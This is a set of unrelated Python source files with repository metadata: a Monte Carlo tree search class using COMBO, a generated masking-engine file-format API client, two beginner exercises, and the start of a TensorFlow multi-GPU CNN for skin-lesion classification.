56c97a56eb3a9d48541998b60af43f385377fdbe
|
refs/heads/master
| 2020-03-31T11:36:55.420586
| 2018-02-21T08:12:15
| 2018-02-21T08:12:15
| 152,183,835
| 1
| 0
| null | 2018-10-09T03:44:07
| 2018-10-09T03:44:07
| null |
UTF-8
|
Python
| false
| false
| 14,498
|
py
|
from __future__ import division
from node import Node
from result import Result
import collections
import random
import numpy as np
import sys
import combo
import math
import ast
class Tree:
def __init__(self, get_reward, positions_order="reverse", max_flag=True, expand_children=1,
space=None, candidate_pool_size=None, no_positions=None, atom_types=None, atom_const=None, play_out=1, play_out_selection="best",
ucb="mean", use_combo=False, combo_init_random=1, combo_step=1, combo_lvl=1, combo_play_out=10):
if space is None:
self.space=None
if (no_positions is None) or (atom_types is None):
sys.exit("no_positions and atom_types should not be None")
else:
self.no_positions = no_positions
self.atom_types = atom_types
self.atom_const = atom_const
if (use_combo) and (candidate_pool_size is None):
sys.exit("Please set the space or set candidate_pool_size for combo search")
else:
self.candidate_pool_size = candidate_pool_size
else:
self.space = space.copy()
self.no_positions = space.shape[1]
self.atom_types = np.unique(space)
if positions_order == "direct":
self.positions_order = range(self.no_positions)
elif positions_order == "reverse":
self.positions_order = range(self.no_positions)[::-1]
elif positions_order == "shuffle":
self.positions_order = random.sample(range(self.no_positions), self.no_positions)
elif isinstance(positions_order, list):
self.positions_order = positions_order
else:
sys.exit("Please specify positions order")
self.chkd_candidates = collections.OrderedDict()
self.max_flag = max_flag
self.root = Node(value='R', children_values=self.atom_types, struct=[None]*self.no_positions)
self.acc_threshold = 0.1
self.get_reward = get_reward
if expand_children == "all":
self.expand_children = len(self.atom_types)
elif isinstance(expand_children, int):
if (expand_children > len(self.atom_types)) or (expand_children == 0):
sys.exit("Please choose appropriate number of children to expand")
else:
self.expand_children = expand_children
self.result = Result()
self.play_out = play_out
if play_out_selection == "best":
self.play_out_selection_mean = False
elif play_out_selection =="mean":
self.play_out_selection_mean = True
else:
sys.exit("Please set play_out_selection to either mean or best")
self.use_combo = use_combo
self.combo_init_random = combo_init_random
self.combo_step = combo_step
self.combo_lvl = combo_lvl
self.combo_play_out=combo_play_out
# if use_combo is True and space is None:
# sys.exit("Please set space to be able to use combo")
if ucb == "best":
self.ucb_mean = False
elif ucb =="mean":
self.ucb_mean = True
else:
sys.exit("Please set ucb to either mean or best")
def _enumerate_cand(self, struct, size):
structure = struct[:]
chosen_candidates = []
if self.atom_const is not None:
for value_id in range(len(self.atom_types)):
if structure.count(self.atom_types[value_id]) > self.atom_const[value_id]:
return chosen_candidates
for pout in range(size):
cand = structure[:]
for value_id in range(len(self.atom_types)):
diff = self.atom_const[value_id] - cand.count(self.atom_types[value_id])
if diff != 0:
avl_pos = [i for i, x in enumerate(cand) if x is None]
to_fill_pos = np.random.choice(avl_pos, diff, replace=False)
for pos in to_fill_pos:
cand[pos] = self.atom_types[value_id]
chosen_candidates.append(cand)
else:
for pout in range(size):
cand = structure[:]
avl_pos = [i for i, x in enumerate(cand) if x is None]
for pos in avl_pos:
cand[pos] = np.random.choice(self.atom_types)
chosen_candidates.append(cand)
return chosen_candidates
def _simulate(self, struct, lvl):
if self.space is None:
if self.use_combo is False:
return self._enumerate_cand(struct,self.play_out)
else:
my_space=self._enumerate_cand(struct,self.candidate_pool_size)
return self._simulate_combo(struct, np.array(my_space))
else:
if (self.use_combo) and (lvl >= self.combo_lvl):
return self._simulate_combo(struct)
else:
return self._simulate_matrix(struct)
def _simulate_matrix(self, struct):
structure = struct[:]
chosen_candidates = []
filled_pos = [i for i, x in enumerate(structure) if x is not None]
filled_values = [x for i, x in enumerate(structure) if x is not None]
sub_data = self.space[:, filled_pos]
avl_candidates_idx = np.where(np.all(sub_data == filled_values, axis=1))[0]
if len(avl_candidates_idx) != 0:
if self.play_out <= len(avl_candidates_idx):
chosen_idxs = np.random.choice(avl_candidates_idx, self.play_out)
else:
chosen_idxs = np.random.choice(avl_candidates_idx, len(avl_candidates_idx))
for idx in chosen_idxs:
chosen_candidates.append(list(self.space[idx]))
return chosen_candidates
def _simulate_combo(self, struct, my_space=None):
chosen_candidates = []
if my_space is None:
structure = struct[:]
filled_pos = [i for i, x in enumerate(structure) if x is not None]
filled_values = [x for i, x in enumerate(structure) if x is not None]
sub_data = self.space[:, filled_pos]
avl_candidates_idx = np.where(np.all(sub_data == filled_values, axis=1))[0]
sub_space=self.space[avl_candidates_idx]
else:
sub_space=my_space
if sub_space.shape[0] !=0:
def combo_simulater(action):
if str(list(sub_space[action[0]])) in self.chkd_candidates.keys():
if self.max_flag:
return self.chkd_candidates[str(list(sub_space[action[0]]))]
else:
return -self.chkd_candidates[str(list(sub_space[action[0]]))]
else:
if self.max_flag:
return self.get_reward(sub_space[action[0]])
else:
return -self.get_reward(sub_space[action[0]])
policy = combo.search.discrete.policy(test_X=sub_space)
if self.combo_play_out <= 1:
sys.exit("combo_play_out can not be less than 2 when use_combo is True")
sub_space_scand_cand=[]
sub_space_scand_val=[]
for c in self.chkd_candidates.keys():
t=np.where(np.all(sub_space == ast.literal_eval(c), axis=1))[0]
if len(t) !=0:
sub_space_scand_cand.append(t[0])
if self.max_flag:
sub_space_scand_val.append(self.chkd_candidates[c])
else:
sub_space_scand_val.append(-self.chkd_candidates[c])
sub_space_pair=zip(sub_space_scand_cand,sub_space_scand_val)
sub_space_pair.sort(key=lambda x: x[1],reverse=True)
if len(sub_space_pair) >= self.combo_play_out:
for i in range(self.combo_play_out):
policy.write(sub_space_pair[i][0],sub_space_pair[i][1])
trained=self.combo_play_out
else:
for x in sub_space_pair:
policy.write(x[0],x[1])
trained=len(sub_space_pair)
if len(sub_space_pair) < self.combo_init_random:
if sub_space.shape[0] >= self.combo_init_random:
policy.random_search(max_num_probes=self.combo_init_random-len(sub_space_pair),
simulator=combo_simulater)
trained=self.combo_init_random
else:
policy.random_search(max_num_probes=sub_space.shape[0] - len(sub_space_pair),
simulator=combo_simulater)
trained=sub_space.shape[0]
if sub_space.shape[0] >= self.combo_play_out:
res = policy.bayes_search(max_num_probes=self.combo_play_out-trained, simulator=combo_simulater
, score='TS', interval=self.combo_step, num_rand_basis=5000)
else:
res = policy.bayes_search(max_num_probes=sub_space.shape[0] - trained, simulator=combo_simulater
, score='TS', interval=self.combo_step, num_rand_basis=5000)
for i in range(len(res.chosed_actions[0:res.total_num_search])):
action=res.chosed_actions[i]
if self.max_flag:
e=res.fx[i]
else:
e=-res.fx[i]
if str(list(sub_space[action])) not in self.chkd_candidates.keys():
self.chkd_candidates[str(list(sub_space[action]))] = e
#action_origin_idx = np.where(np.all(self.space== sub_space[action], axis=1))[0]
#self.space = np.delete(self.space,action_origin_idx[0],axis=0)
chosen_candidates.append(list(sub_space[action]))
return chosen_candidates
def search(self, no_candidates=None, display=True):
prev_len = 0
prev_current = None
round_no = 1
if no_candidates is None :
sys.exit("Please specify no_candidates")
else:
while len(self.chkd_candidates) < no_candidates:
current = self.root.select(self.max_flag, self.ucb_mean)
if current.level == self.no_positions:
struct = current.struct[:]
if str(struct) not in self.chkd_candidates.keys():
e = self.get_reward(struct)
self.chkd_candidates[str(struct)] = e
else:
e = self.chkd_candidates[str(struct)]
current.bck_prop(e)
else:
position = self.positions_order[current.level]
try_children = current.expand(position, self.expand_children)
for try_child in try_children:
all_struct = self._simulate(try_child.struct,try_child.level)
#if len(all_struct) != 0:
rewards = []
for struct in all_struct:
if str(struct) not in self.chkd_candidates.keys():
e = self.get_reward(struct)
if e is not False:
self.chkd_candidates[str(struct)] = e
else:
e = self.chkd_candidates[str(struct)]
rewards.append(e)
rewards[:] = [x for x in rewards if x is not False]
if len(rewards)!=0:
if self.play_out_selection_mean:
best_e = np.mean(rewards)
else:
if self.max_flag:
best_e = max(rewards)
else:
best_e = min(rewards)
try_child.bck_prop(best_e)
else:
current.children[try_child.value] = None
all_struct = self._simulate(current.struct,current.level)
rewards = []
for struct in all_struct:
if str(struct) not in self.chkd_candidates.keys():
e = self.get_reward(struct)
self.chkd_candidates[str(struct)] = e
else:
e = self.chkd_candidates[str(struct)]
rewards.append(e)
if self.play_out_selection_mean:
best_e = np.mean(rewards)
else:
if self.max_flag:
best_e = max(rewards)
else:
best_e = min(rewards)
current.bck_prop(best_e)
if (current == prev_current) and (len(self.chkd_candidates) == prev_len):
adjust_val = (no_candidates-len(self.chkd_candidates))/no_candidates
if adjust_val < self.acc_threshold:
adjust_val = self.acc_threshold
current.adjust_c(adjust_val)
prev_len = len(self.chkd_candidates)
prev_current = current
if display:
print "round ", round_no
print "checked candidates = ", len(self.chkd_candidates)
if self.max_flag:
print "current best = ", max(self.chkd_candidates.itervalues())
else:
print "current best = ", min(self.chkd_candidates.itervalues())
round_no += 1
self.result.format(no_candidates=no_candidates, chkd_candidates=self.chkd_candidates, max_flag=self.max_flag)
self.result.no_nodes, visits, self.result.max_depth_reached = self.root.get_info()
self.result.avg_node_visit = visits / self.result.no_nodes
return self.result
|
[
"thaer.dieb@gmail.com"
] |
thaer.dieb@gmail.com
|
e057ef624b94fe0256123ec91bdf0734eb2d87bd
|
a79bc871a72d2c39bcbb7cb4242a7d469770bed0
|
/masking_api_60/api/file_format_api.py
|
750b5fa51da54a2f71b8f4f29ba1d59f7edf3fc1
|
[] |
no_license
|
pioro/masking_api_60
|
5e457249ab8a87a4cd189f68821167fa27c084f2
|
68473bdf0c05cbe105bc7d2e2a24e75a9cbeca08
|
refs/heads/master
| 2023-01-03T08:57:49.943969
| 2020-10-30T11:42:15
| 2020-10-30T11:42:15
| 279,624,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,223
|
py
|
# coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from masking_api_60.api_client import ApiClient
class FileFormatApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_file_format(self, file_format, file_format_type, **kwargs): # noqa: E501
"""Create file format # noqa: E501
WARNING: The generated curl command is incorrect, so please refer to the Masking API guide for instructions on how to upload files through the API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_file_format(file_format, file_format_type, async_req=True)
>>> result = thread.get()
:param async_req bool
:param file file_format: The file format to be uploaded. The logical name of the file format will be exactly the name of this uploaded file (required)
:param str file_format_type: The type of the file format being uploaded (required)
:return: FileFormat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_file_format_with_http_info(file_format, file_format_type, **kwargs) # noqa: E501
else:
(data) = self.create_file_format_with_http_info(file_format, file_format_type, **kwargs) # noqa: E501
return data
def create_file_format_with_http_info(self, file_format, file_format_type, **kwargs): # noqa: E501
"""Create file format # noqa: E501
WARNING: The generated curl command is incorrect, so please refer to the Masking API guide for instructions on how to upload files through the API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_file_format_with_http_info(file_format, file_format_type, async_req=True)
>>> result = thread.get()
:param async_req bool
:param file file_format: The file format to be uploaded. The logical name of the file format will be exactly the name of this uploaded file (required)
:param str file_format_type: The type of the file format being uploaded (required)
:return: FileFormat
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_format', 'file_format_type'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_file_format" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_format' is set
if ('file_format' not in params or
params['file_format'] is None):
raise ValueError("Missing the required parameter `file_format` when calling `create_file_format`") # noqa: E501
# verify the required parameter 'file_format_type' is set
if ('file_format_type' not in params or
params['file_format_type'] is None):
raise ValueError("Missing the required parameter `file_format_type` when calling `create_file_format`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'file_format' in params:
local_var_files['fileFormat'] = params['file_format'] # noqa: E501
if 'file_format_type' in params:
form_params.append(('fileFormatType', params['file_format_type'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/file-formats', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileFormat', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_file_format(self, file_format_id, **kwargs): # noqa: E501
"""Delete file format by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_file_format(file_format_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int file_format_id: The ID of the file format to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_file_format_with_http_info(file_format_id, **kwargs) # noqa: E501
else:
(data) = self.delete_file_format_with_http_info(file_format_id, **kwargs) # noqa: E501
return data
def delete_file_format_with_http_info(self, file_format_id, **kwargs): # noqa: E501
"""Delete file format by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_file_format_with_http_info(file_format_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int file_format_id: The ID of the file format to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_format_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_file_format" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_format_id' is set
if ('file_format_id' not in params or
params['file_format_id'] is None):
raise ValueError("Missing the required parameter `file_format_id` when calling `delete_file_format`") # noqa: E501
collection_formats = {}
path_params = {}
if 'file_format_id' in params:
path_params['fileFormatId'] = params['file_format_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/file-formats/{fileFormatId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_file_formats(self, **kwargs): # noqa: E501
"""Get all file formats # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_file_formats(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get file formats. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: FileFormatList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_file_formats_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_file_formats_with_http_info(**kwargs) # noqa: E501
return data
def get_all_file_formats_with_http_info(self, **kwargs): # noqa: E501
"""Get all file formats # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_file_formats_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get file formats. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: FileFormatList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_file_formats" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/file-formats', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileFormatList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_file_format_by_id(self, file_format_id, **kwargs): # noqa: E501
"""Get file format by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_file_format_by_id(file_format_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int file_format_id: The ID of the file format to get (required)
:return: FileFormat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_file_format_by_id_with_http_info(file_format_id, **kwargs) # noqa: E501
else:
(data) = self.get_file_format_by_id_with_http_info(file_format_id, **kwargs) # noqa: E501
return data
def get_file_format_by_id_with_http_info(self, file_format_id, **kwargs): # noqa: E501
"""Get file format by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_file_format_by_id_with_http_info(file_format_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int file_format_id: The ID of the file format to get (required)
:return: FileFormat
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_format_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_file_format_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_format_id' is set
if ('file_format_id' not in params or
params['file_format_id'] is None):
raise ValueError("Missing the required parameter `file_format_id` when calling `get_file_format_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'file_format_id' in params:
path_params['fileFormatId'] = params['file_format_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/file-formats/{fileFormatId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileFormat', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_file_format(self, file_format_id, body, **kwargs): # noqa: E501
"""Update file format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_file_format(file_format_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int file_format_id: The ID of the file format to update (required)
:param FileFormat body: The updated file format (required)
:return: FileFormat
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_file_format_with_http_info(file_format_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_file_format_with_http_info(file_format_id, body, **kwargs) # noqa: E501
return data
def update_file_format_with_http_info(self, file_format_id, body, **kwargs): # noqa: E501
"""Update file format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_file_format_with_http_info(file_format_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int file_format_id: The ID of the file format to update (required)
:param FileFormat body: The updated file format (required)
:return: FileFormat
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_format_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_file_format" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_format_id' is set
if ('file_format_id' not in params or
params['file_format_id'] is None):
raise ValueError("Missing the required parameter `file_format_id` when calling `update_file_format`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_file_format`") # noqa: E501
collection_formats = {}
path_params = {}
if 'file_format_id' in params:
path_params['fileFormatId'] = params['file_format_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/file-formats/{fileFormatId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileFormat', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"marcin@delphix.com"
] |
marcin@delphix.com
|
6b7bcedc92889fdfac3fae2f3865e4e431ac3a06
|
c381e484986b08022be508f285cc142017680319
|
/mycats.py
|
6c7f2ff8b22648624d73da15fc6a121f54af7a82
|
[] |
no_license
|
kasalak/automate-the-boring-stuff
|
1060d4919f23b25c6653fd55ef09c436bb7ea2bd
|
e205bac5cd629f52af11e5ace6475e764612498e
|
refs/heads/master
| 2021-01-21T13:53:14.332726
| 2016-05-10T17:24:04
| 2016-05-10T17:24:04
| 51,721,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
mypets = ['Zophie', 'Pooka', 'Fat-tail']
print('Enter a pet name: ')
name = input()
if name not in mypets:
print('I do not have a pet named ' + name)
else:
print(name + ' is my pet.x`')
|
[
"karthik.kasala@gmail.com"
] |
karthik.kasala@gmail.com
|
de7e14bb4a48b4fa23f12d9b6ee34dd226ad6ecb
|
843af55f35c54d85bf6006ccf16c79d9a5451285
|
/25 - more_lists.py
|
8af52312523c5eb4245f871af28a73e7de55b267
|
[] |
no_license
|
estebantoso/curso_python_udemy
|
2a5989351921d54394b61df1e8089c58088a01cc
|
0f4deba3b0efbc59159aaeb49ffd95c6724c2dd2
|
refs/heads/master
| 2020-05-22T19:00:36.599701
| 2019-05-23T14:49:31
| 2019-05-23T14:49:31
| 186,485,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87
|
py
|
friends = ["A", "B", "C"]
print(friends[0])
print(friends[-1])
print("A" in friends)
|
[
"estebantoso@gmail.com"
] |
estebantoso@gmail.com
|
862a41c8dfac8339006c6b0313a9a71788c0ef52
|
1fcb40f1f2a2c6b4f5ab6c612b900c7eb9517502
|
/tf-tutorials/multigpu/multi_gpu_cnn.py
|
1954bcca56e4a3d6e52d3c5b5927bba9e28deb39
|
[] |
no_license
|
prativa/ai-artist
|
3466b7b160180d207c94429fbec2bd33b0da53c8
|
ee98af787233889ed92cc84ce66104e3f7f6e84a
|
refs/heads/master
| 2020-04-15T19:11:45.467297
| 2018-11-29T20:22:48
| 2018-11-29T20:22:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,137
|
py
|
import tensorflow as tf
import os
import numpy as np
import math
from classification.skin import data_loader
import time
import random
from sklearn import metrics
_IMAGE_SIZE = 224
_IMAGE_CHANNELS = 3
_NUM_CLASSES = 2
_BATCH_SIZE = 50 # this batch size will be for each gpu, if multi gpu setup used it will consume batch_size * gpu nums in every iteration.
_EPOCHS = 1000
learning_rate = 0.0001
gpu_nums=2
_BATCH_SIZE_VALID = 75
_SAVE_PATH = "./tensorboard/isic-classification-task1/"
def core_model(input_img, y, num_classes):
x_image = tf.reshape(input_img, [-1, _IMAGE_SIZE, _IMAGE_SIZE, _IMAGE_CHANNELS], name='images')
def variable_with_weight_decay(name, shape, stddev, wd):
dtype = tf.float32
var = variable_on_cpu(name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
with tf.variable_scope('conv1') as scope:
kernel = variable_with_weight_decay('weights', shape=[5, 5, 3, 64], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(x_image, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv1', conv1)
tf.summary.scalar('Convolution_layers/conv1', tf.nn.zero_fraction(conv1))
norm1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
pool1 = tf.nn.max_pool(norm1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
with tf.variable_scope('conv2') as scope:
kernel = variable_with_weight_decay('weights', shape=[5, 5, 64, 64], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.1))
pre_activation = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv2', conv2)
tf.summary.scalar('Convolution_layers/conv2', tf.nn.zero_fraction(conv2))
norm2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm2')
pool2 = tf.nn.max_pool(norm2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
with tf.variable_scope('conv3') as scope:
kernel = variable_with_weight_decay('weights', shape=[3, 3, 64, 128], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv3 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv3', conv3)
tf.summary.scalar('Convolution_layers/conv3', tf.nn.zero_fraction(conv3))
with tf.variable_scope('conv4') as scope:
kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv4 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv4', conv4)
tf.summary.scalar('Convolution_layers/conv4', tf.nn.zero_fraction(conv4))
with tf.variable_scope('conv5') as scope:
kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(conv4, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv5 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv5', conv5)
tf.summary.scalar('Convolution_layers/conv5', tf.nn.zero_fraction(conv5))
norm3 = tf.nn.lrn(conv5, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm3')
pool3 = tf.nn.max_pool(norm3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool3')
with tf.variable_scope('fully_connected1') as scope:
reshape = tf.layers.flatten(pool3)
dim = reshape.get_shape()[1].value
weights = variable_with_weight_decay('weights', shape=[dim, 384], stddev=0.04, wd=0.004)
biases = variable_on_cpu('biases', [384], tf.constant_initializer(0.1))
local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)
tf.summary.histogram('Fully connected layers/fc1', local3)
tf.summary.scalar('Fully connected layers/fc1', tf.nn.zero_fraction(local3))
with tf.variable_scope('fully_connected2') as scope:
weights = variable_with_weight_decay('weights', shape=[384, 192], stddev=0.04, wd=0.004)
biases = variable_on_cpu('biases', [192], tf.constant_initializer(0.1))
